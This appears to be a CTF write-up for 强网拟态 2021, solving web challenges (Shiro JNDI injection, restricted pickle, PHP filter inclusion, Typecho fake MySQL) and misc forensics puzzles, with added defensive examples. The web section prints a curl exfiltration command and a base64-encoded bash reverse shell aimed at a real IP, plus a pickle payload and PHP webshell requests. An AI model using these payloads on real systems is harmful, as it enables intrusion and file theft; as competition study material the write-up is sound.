
强网拟态 2021

Just writing these down for the record.

web

zerocalc

Simply `e=readFile('/flag')`.

Jack-Shiro

The challenge provides the pom.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>1.5.22.RELEASE</version>
        <relativePath/>
    </parent>
    <modelVersion>4.0.0</modelVersion>
    <artifactId>ctf</artifactId>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
                <configuration>
                    <fork>true</fork>
                    <mainClass>com.ctf.Application</mainClass>
                </configuration>
                <executions>
                    <execution>
                        <goals>
                            <goal>repackage</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-web</artifactId>
            <version>1.5.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-spring</artifactId>
            <version>1.5.1</version>
        </dependency>
        <dependency>
            <groupId>ch.qos.logback</groupId>
            <artifactId>logback-core</artifactId>
            <version>1.2.1</version>
        </dependency>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>
</project>
```

This is the original challenge from 红名谷 CTF; first start this:

```bash
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl http://134.175.168.213:1234 -F file=@/flag"
```

Or use the base64-encoded form:

```bash
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMzQuMTc1LjE2OC4yMTMvMTIzNCAwPiYxIg==}|{base64,-d}|{bash,-i}" -A 134.175.168.213
```

Just copy over the rmi part:

```text
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://134.175.168.213:1099/ecqgav
```


ezPickle

app.py:

```python
from flask import Flask,request,session,render_template_string,url_for,redirect
import pickle
import io
import sys
import base64
import random
import subprocess
from config import notadmin

app = Flask(__name__)
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only names from the config module, and none containing "__", may be imported
        if module in ['config'] and "__" not in name:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("'%s.%s' not allowed" % (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/')
def index():
    info = request.args.get('name', '')
    if info != '':
        x = base64.b64decode(info)
        User = restricted_loads(x)
    return render_template_string('Hello')

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True, port=5000)
```

config.py:

```python
notadmin={"admin":"no"}

def backdoor(cmd):
    if notadmin["admin"]=="yes":
        s=''.join(cmd)
        eval(s)
```

There is a filter here: the name must be an attribute of config, and it must not contain `__`:

```python
if module in ['config'] and "__" not in name
```

So we only need to set notadmin["admin"] to "yes". Build it with pker:

```python
backdoor =  GLOBAL("config","backdoor")
notadmin = GLOBAL("config","notadmin")
notadmin["admin"] = "yes"
backdoor("__import__('os').system('curl -F file=@/flag http://134.175.168.213:1234')")
```

The script is as follows:

```python
import base64
import requests
opc = b'cconfig\nbackdoor\np0\n0cconfig\nnotadmin\np1\n0g1\nS\'admin\'\nS\'yes\'\nsg0\n(S\'__import__(\\\'os\\\').system(\\\'curl -F file=@/flag http://134.175.168.213:1234\\\')\'\ntR.'
payload = str(base64.b64encode(opc),'utf-8')
requests.get("http://124.71.183.254:32769/?name="+payload)
```

The flag arrives at the listener.
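The reason the filter above fails is worth spelling out from the defender's side: `find_class` only decides which module a GLOBAL opcode may import from and blocks dunder names. It does not stop the unpickler from reaching any callable in that module, nor from rewriting module-level state with the SETITEM opcode. The following Python is an added example, not the challenge's or the author's code. It installs a constructed `config` stand-in (whose `backdoor` records instead of `eval`-ing), replays the same opcode sequence as the solution with a harmless string in place of the command, and contrasts the challenge's filter with an explicit `(module, name)` allowlist and with a `find_class` that refuses all globals. The class and function names (`WeakUnpickler`, `DataOnlyUnpickler`, `NoGlobalsUnpickler`, `demo_*`) are my own.

```python
import io
import pickle
import sys
import types

# Constructed stand-in for the challenge's config module so this runs offline.
# The real backdoor() calls eval(); this one only records what it would have evaluated.
config = types.ModuleType("config")
config.notadmin = {"admin": "no"}
config.executed = []


def backdoor(cmd):
    if config.notadmin["admin"] == "yes":
        config.executed.append("".join(cmd))


config.backdoor = backdoor
sys.modules["config"] = config

# Same opcode sequence as the solution, with a harmless string in place of the command:
# GLOBAL config.backdoor, GLOBAL config.notadmin, SETITEM notadmin['admin']='yes',
# then REDUCE backdoor(('hello',)).
PAYLOAD = (b"cconfig\nbackdoor\np0\n0cconfig\nnotadmin\np1\n0g1\n"
           b"S'admin'\nS'yes'\nsg0\n(S'hello'\ntR.")
# A payload that never touches a callable: it only rewrites the module-level dict.
STATE_ONLY_PAYLOAD = b"cconfig\nnotadmin\nS'admin'\nS'yes'\ns."


class WeakUnpickler(pickle.Unpickler):
    """The challenge's filter: any name in config without '__' may be imported."""
    def find_class(self, module, name):
        if module in ['config'] and "__" not in name:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("'%s.%s' not allowed" % (module, name))


class DataOnlyUnpickler(pickle.Unpickler):
    """Explicit allowlist of (module, name) pairs holding data, never callables."""
    ALLOWED = {("config", "notadmin")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("'%s.%s' not allowed" % (module, name))


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL/STACK_GLOBAL: only built-in containers and scalars can be rebuilt."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError("global '%s.%s' refused" % (module, name))


def _reset():
    config.notadmin["admin"] = "no"
    config.executed.clear()


def _load(unpickler_cls, data):
    try:
        unpickler_cls(io.BytesIO(data)).load()
        return "loaded"
    except pickle.UnpicklingError:
        return "rejected"


def demo_weak():
    """Challenge filter: the payload loads, flips the flag and reaches backdoor()."""
    _reset()
    outcome = _load(WeakUnpickler, PAYLOAD)
    return outcome, config.notadmin["admin"], list(config.executed)


def demo_data_only():
    """Allowlisting only the dict blocks the call, but module state can still be rewritten."""
    _reset()
    first = _load(DataOnlyUnpickler, PAYLOAD)               # rejected at config.backdoor
    second = _load(DataOnlyUnpickler, STATE_ONLY_PAYLOAD)   # loads and sets admin=yes
    return first, second, config.notadmin["admin"]


def demo_no_globals():
    """Refusing all globals stops both payloads while plain data still round-trips."""
    _reset()
    a = _load(NoGlobalsUnpickler, PAYLOAD)
    b = _load(NoGlobalsUnpickler, STATE_ONLY_PAYLOAD)
    c = _load(NoGlobalsUnpickler, pickle.dumps({"name": "guest", "n": 3}))
    return a, b, c, config.notadmin["admin"]


if __name__ == "__main__":
    print(demo_weak(), demo_data_only(), demo_no_globals())
```

The middle case is the instructive one: even an allowlist that admits only a plain dict lets a pickle mutate that dict in place, because SETITEM needs no import. If untrusted input has to be deserialised at all, refusing every global (or using a non-executable format such as JSON) is the only variant that holds.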

EasyFilter

With action=w you can write a file into the files directory; the filename is random and the content is base64-encoded. With action=r there is a file inclusion. Testing showed that a form like

```text
php://filter/resource=convert.base64-decode/../76f58af80b
```

keeps the php filter syntax valid and triggers the base64 filter. So first write a PHP snippet that runs cat /flag, then include the file.

Payload:

```text
/?action=w&c=<?php%20system('cat+/flag');?>
/?action=r&r=convert.base64-decode/../76f58af80b
```
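Seen from the defender's side, both requests leave distinctive traces in the web server's access log: a PHP open tag inside a parameter that gets written to disk, and a stream-filter name combined with `../` inside an include parameter. The following Python is an added example, not part of the writeup: it scans constructed access-log lines modelled on the two payloads above and reports which indicators each request matched after percent-decoding. The log lines, indicator names and regular expressions are my own construction.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines modelled on the writeup's two requests (not real server logs).
SAMPLE_LOG = """\
192.0.2.10 - - [25/Oct/2021:14:32:46 +0800] "GET /?action=w&c=%3C%3Fphp%20system%28%27cat+/flag%27%29%3B%3F%3E HTTP/1.1" 200 512
192.0.2.10 - - [25/Oct/2021:14:32:51 +0800] "GET /?action=r&r=convert.base64-decode/../76f58af80b HTTP/1.1" 200 48
192.0.2.11 - - [25/Oct/2021:14:33:02 +0800] "GET /?action=r&r=76f58af80b HTTP/1.1" 200 90
"""

# Indicators of wrapper/filter abuse and of PHP code being smuggled through a write parameter
INDICATORS = {
    "php_wrapper": re.compile(r"php://", re.I),
    "php_filter_name": re.compile(
        r"convert\.(?:base64-(?:en|de)code|iconv|quoted-printable)"
        r"|string\.(?:rot13|toupper|tolower|strip_tags)", re.I),
    "traversal": re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)"),
    "php_open_tag": re.compile(r"<\?(?:php|=)", re.I),
}
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def decode_params(target):
    """Return every query-parameter value, percent-decoded a second time to catch double encoding."""
    query = urlsplit(target).query
    values = []
    for vs in parse_qs(query, keep_blank_values=True).values():
        values.extend(unquote(v) for v in vs)
    return values


def scan_line(line):
    """Set of indicator names matched by any parameter value in one log line."""
    m = REQUEST_LINE.search(line)
    if not m:
        return set()
    hits = set()
    for value in decode_params(m.group(1)):
        for name, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add(name)
    return hits


def scan_log(text):
    """Return [(line_number, sorted indicator names)] for every line with at least one hit."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, sorted(hits)))
    return findings


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(n, hits)
```

Matching on decoded parameter values rather than the raw request line matters here: the first payload is fully percent-encoded on the wire and only shows its `<?php` after decoding, while the third line (a plain include of the random filename) correctly produces no finding.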

Give_me_your_0day

Opening the challenge shows the Typecho installation page, which can also be seen in the provided attachment. In install, the dbadapter parameter selects the database type, and the IP and port can be specified.

This suggests starting a mysql_fake_server.

Then change the fileread username in the config so that it reads /flag:

```json
{
    "fileread": {
        "win_ini": "c:\\windows\\win.ini",
        "win_hosts": "c:\\windows\\system32\\drivers\\etc\\hosts",
        "win": "c:\\windows\\",
        "root": "/flag"
```

misc

bar

Use a site such as https://www.bejson.com/convert/gif2frame/ to split the gif into frames.

```python
from PIL import Image

# Code 39 bar patterns (9 elements each) and the characters they encode, in the same order
string = ['100010100', '101001000', '101000100', '101000010', '100101000', '100100100', '100100010', '101010000', '100010010', '100001010', '110101000', '110100100', '110100010', '110010100', '110010010', '110001010', '101101000', '101100100', '101100010', '100110100', '100011010', '101011000', '101001100', '101000110', '100101100', '100010110', '110110100', '110110010', '110101100', '110100110', '110010110', '110011010', '101101100', '101100110', '100110110', '100111010', '100101110']
number = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '-']
qwe = ''
result = ''
code = []
# Each frame is one bar or space: sample a pixel to decide black (1) or white (0)
for i in range(1, 335):
    img = Image.open('images/output-%s.png' % str(i))
    if img.getpixel((9, 9))[0] == 0:
        result += '1'
    elif img.getpixel((3, 3))[0] == 255:
        result += '0'
    else:
        result += '?'
# Group the bit string into 9-element symbols and look each one up; keep the unknown ones
for i in range(0, len(result), 9):
    if result[i:i+9] in string:
        qwe += number[string.index(result[i:i+9])]
    else:
        qwe += '?'
        code.append(result[i:i+9])
print(qwe.lower())
print(code)
```

Output:

```text
????f0c62db973684dbda896f9c5f6d962????
['1010?111?', '100?0?111', '10?00011?', '101011110', '000000000', '000000000', '101011110', '1']
```

Go to this site: http://tiaoxingma.wiicha.com/


The two trailing check characters come out as 110010110 101001100, which the code table maps to um.

```text
flag{f0c62db973684dbda896f9c5f6d962um}
```

BlueWhale

Following TCP stream 5 reveals the password th1sIsThEpassw0rD.

![image-20211026093418015](F:/picture/拟态 2021/image-20211026093418015.png)

Write the password into a password.txt file, zip it with Windows, and use ARCHPR to decrypt the archive, which gives !2b$3&Ec.

Then extract the flag with LSB steganography.

WeirdPhoto

Dragging the image into 010 Editor reports a CRC error: the width and height were modified without updating the CRC, so reading the chunk fails.

![image-20211026144014943](F:/picture/拟态 2021/image-20211026144014943.png)

Brute-force the image's width and height with a script, editing wid, hei and crc32 to match the file:

```python
import struct
import zlib

def hexStr2bytes(s):
    # Convert a hex string such as "49484452" into raw bytes
    b = b""
    for i in range(0, len(s), 2):
        temp = s[i:i+2]
        b += struct.pack("B", int(temp, 16))
    return b

str1 = "49484452"    # "IHDR" chunk type
str2 = "0806000000"  # bit depth 8, colour type 6, compression, filter, interlace
bytes1 = hexStr2bytes(str1)
bytes2 = hexStr2bytes(str2)

wid, hei = 0x3e8, 0x1f4   # width and height currently stored in the file
crc32 = 0x9e916964        # CRC stored after the IHDR chunk

for w in range(wid, wid + 2000):
    for h in range(hei, hei + 2000):
        width = hex(w)[2:].rjust(8, '0')
        height = hex(h)[2:].rjust(8, '0')
        bytes_temp = hexStr2bytes(width + height)
        # The CRC covers chunk type + data, so a match means these are the real dimensions
        if zlib.crc32(bytes1 + bytes_temp + bytes2) == crc32:
            print(hex(w), hex(h))
```

The output is 0x58c 0x1f4. After fixing the dimensions, the image shows the string TIEWOFTHSAEOUIITNRBCOSHSTSAN.

This is a rail-fence cipher: THISISTHEANSWERTOOBSFUCATION. After decompressing, the result is a PDF with no file header; prepend the header 25 50 44 46, save it as a pdf, and run it through wbs43open.

mirror

Opening the file in 010 Editor shows a PNG header at the very end of the file, with every 16-byte block reversed.

Use a script to read the file reversed, then write it back out reversing each 16-byte block:

```python
with open('full.png','rb') as f:
    s = f.read()[::-1]
with open('flag.png','wb') as g:
    for i in range(0, len(s), 16):
        g.write(s[i:i+16][::-1])
```

Dragging flag.png into 010 Editor again gives a CRC error; running the script above yields ('0x922', '0x505').
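WeirdPhoto and mirror both rest on the same PNG property: the CRC after every chunk covers the chunk type plus its data, so a width or height edited in IHDR no longer matches the stored CRC (that is the error 010 Editor reports), and the stored CRC can be used to recover the true dimensions. The following Python is an added example rather than the writeup's script: it builds a small constructed PNG, walks its chunks verifying each CRC, tampers with the height the way the challenge files were tampered with, and brute-forces the dimensions back. It generalises the page's loop slightly by using zlib.crc32's running-checksum argument so the `IHDR` + width prefix is hashed once per width. Function names (`build_png`, `bad_chunks`, `tamper_height`, `recover_ihdr_dims`, `demo`) are my own.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype, data):
    """Serialise one chunk: 4-byte length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(ctype + data) & 0xffffffff
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(width, height):
    """Constructed sample image (8-bit RGBA, all-zero scanlines): IHDR + IDAT + IEND."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    raw = bytes(height * (1 + width * 4))   # one filter byte plus RGBA pixels per row
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


def iter_chunks(png):
    """Yield (type, data, stored_crc, computed_crc) per chunk: the check 010 Editor performs."""
    if png[:8] != PNG_SIG:
        raise ValueError("missing PNG signature")
    pos = 8
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (stored,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        yield ctype, data, stored, zlib.crc32(ctype + data) & 0xffffffff
        pos += 12 + length
        if ctype == b"IEND":
            break


def bad_chunks(png):
    """Names of the chunks whose stored CRC does not match their contents."""
    return [ctype.decode("ascii") for ctype, _, stored, calc in iter_chunks(png) if stored != calc]


def tamper_height(png, new_height):
    """Overwrite IHDR's height field but leave its CRC untouched, as the challenge file did.
    IHDR data starts at offset 16 (signature 8 + length 4 + type 4); height is data bytes 4..8."""
    return png[:20] + struct.pack(">I", new_height) + png[24:]


def recover_ihdr_dims(ihdr_data, stored_crc, max_dim=512):
    """Brute-force (width, height) whose IHDR CRC equals stored_crc, keeping the other fields.
    The CRC over b"IHDR" + width is computed once per width and extended per height through
    zlib.crc32's running-checksum argument, so the inner loop hashes only nine bytes."""
    tail = ihdr_data[8:]   # bit depth, colour type, compression, filter, interlace
    for w in range(1, max_dim + 1):
        prefix = zlib.crc32(b"IHDR" + struct.pack(">I", w))
        for h in range(1, max_dim + 1):
            if zlib.crc32(struct.pack(">I", h) + tail, prefix) & 0xffffffff == stored_crc:
                return w, h
    return None


def demo():
    """Good file validates; the tampered file fails on IHDR; brute force recovers the real size."""
    good = build_png(40, 30)
    tampered = tamper_height(good, 3)
    ihdr_data = tampered[16:29]
    (stored_crc,) = struct.unpack(">I", tampered[29:33])
    return bad_chunks(good), bad_chunks(tampered), recover_ihdr_dims(ihdr_data, stored_crc, max_dim=64)


if __name__ == "__main__":
    print(demo())
```

Running `demo()` returns the empty mismatch list for the intact file, `['IHDR']` for the tampered one, and `(40, 30)` from the brute force. On a real file, read the 13 IHDR data bytes at offset 16 and the four CRC bytes at offset 29 exactly as `demo()` does, and raise `max_dim` to cover plausible image sizes; the search is quadratic in `max_dim`, which is why the writeup's loop starts from the dimensions already stored in the file.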

Then run it through the blind-watermark tool:

```bash
python3 bwmforpy3.py decode flag.png full.png 1.png
```

The flag is then in the top-left corner.